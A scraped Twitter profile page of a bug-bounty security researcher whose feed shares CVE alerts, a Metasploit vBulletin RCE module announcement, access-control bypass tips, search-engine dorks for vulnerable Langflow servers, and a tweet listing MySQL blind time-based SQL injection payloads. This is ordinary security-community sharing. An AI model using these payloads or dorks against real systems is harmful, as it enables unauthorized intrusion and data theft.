PhyoMin Lwin (@phyomin1337) 's Twitter Profile
PhyoMin Lwin

@phyomin1337

Security researcher

ID: 1797609971154395136

Joined: 03-06-2024 12:43:25

56 Tweets

4 Followers

83 Following

s1r1us (@s1r1u5_):

Ben Sadeghipour Pick a niche, become an expert, find bugs maybe even 0days or reverse n-days, and write blogs. Even if you don’t hit those $100k bounties, it’ll be a stepping stone toward a $100k job. What niche? How to pick? Examples? infosec being so vast from web3 sec to web2, mobile,

Hunter (@huntermapping):

🚨Alert🚨CVE-2025-4918 & CVE-2025-4919: Two Critical Firefox 0-Day Vulnerabilities Exploited.
🧐Credit: CVE-2025-4918 from Edouard Bochin & @Ga1ois: x.com/hosselot/statu…
CVE-2025-4919 from Manfred Paul
📊 9.5K+ Services are found on the hunter.how yearly.
🔗Hunter

¯\_(ツ)_/¯ (@chocapikk_):

🚨 New unauthenticated #RCE module for vBulletin 5.1.0-6.0.3 landed in Metasploit! No CVE assigned, but credit to Egidio Romano (EgiX) for the original write-up: karmainsecurity.com/dont-call-that…

🔗 PR: github.com/rapid7/metaspl…

Tuan Anh Nguyen⚡️ 🇻🇳 (@haxor31337):

From SSRF to RCE and transferring money in core banking. It is a really cool red team case: a perfect combination of external and internal vulnerabilities complementing each other to bypass the monitoring and detection of the blue team. Presented by my colleague Q5Ca: youtu.be/xBnMrNCuO_w?si…

chux (@chux13786509):

Hackers 🔥
Stuck on a 403?
Here are some powerful tricks to try for bypassing 🚀
1⃣ X-Forwarded-For
2⃣ X-Original-URL
3⃣ Referer
4⃣ HTTP method manipulation
5⃣ Case sensitive (/admin or /aDmIn)
6⃣ Encoding
7⃣ Path normalization
Happy hunting! 🎯

khan mamun (@mamunwhh):

#MySQL Blind Time Based Payload:
0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z
0'XOR(if (now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(), sleep(5),0)
'XOR(if(now()=sysdate(), sleep(5),0))XOR'
'XOR(if (now()=sysdate(), sleep(5*1),0))OR'
#bugbountytips #bugbountytip

pdnuclei-bot (@pdnuclei_bot):

🚨 CVE-2025-0133 - medium 🚨 PAN-OS - Reflected Cross-Site Scripting > A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway an... 👾 cloud.projectdiscovery.io/library/CVE-20… Nuclei by ProjectDiscovery #NucleiTemplates #cve

Mustafa Adam Qamar El-Din (@wadgamaraldeen):

I enjoyed Exploring and Exploiting CVE-2025-3248-Langflow RCE

- Affected Endpoint: /api/v1/validate/code

- ZoomEye Dork :- domain="test.com" && app="Langflow"

- Shodan Dork :- ssl:"test.com" http.title:"Langflow"

Lu3ky13 ⚡️⚡️ (@lu3ky13):

I'll be posting from prison in a while 😂
Does ibrahimxss steal user data? When you find xss in the tool, it steals data. This is the admin dashboard

He threatens me if I don't delete the post

#scammers #xss0r xss0r

Tur.js (@tur24tur):

Did Cloudflare just defeat Burp Suite and Caido?
Cloudflare protection is becoming very common. This is the third app I’ve seen using it. Changing the user agent doesn’t help, and Burp TLS-fingerprint bypass plugin didn’t work. The app blocks any request when it detects

zere (@j_zere):

Just published my first blog post "Cache Deception + CSPT: Turning Non Impactful Findings into Account Takeover" You can read the full write-up here: zere.es/posts/cache-de…

Soroush Dalili (@irsdl):

Auraditor version 2.0.3 is out 🎉
github.com/irsdl/auraditor

We should now be able to select a Salesforce ID and enumerate it in Intruder.

It supports a little bit of LWC detection from JS now. Perhaps it requires a rename in version 3.x! 😅

PhyoMin Lwin (@phyomin1337):

Never buy scripts or tools that other people sell for bug bounty. Most of those tools just waste your valuable time, make you lose direction, and can even discourage you. The best way is to put in your own effort and search for bugs yourself #BugBounty

Youssef Sammouda (sam0) (@samm0uda):

Datr cookie theft and AI leading to Facebook account takeover ($24,000)
ysamm.com/uncategorized/…
Two-click Facebook account takeover via FXAuth ($30,000)
ysamm.com/uncategorized/…
Self-XSS in Facebook payments flow leads to account takeovers ($62,500)
ysamm.com/uncategorized/…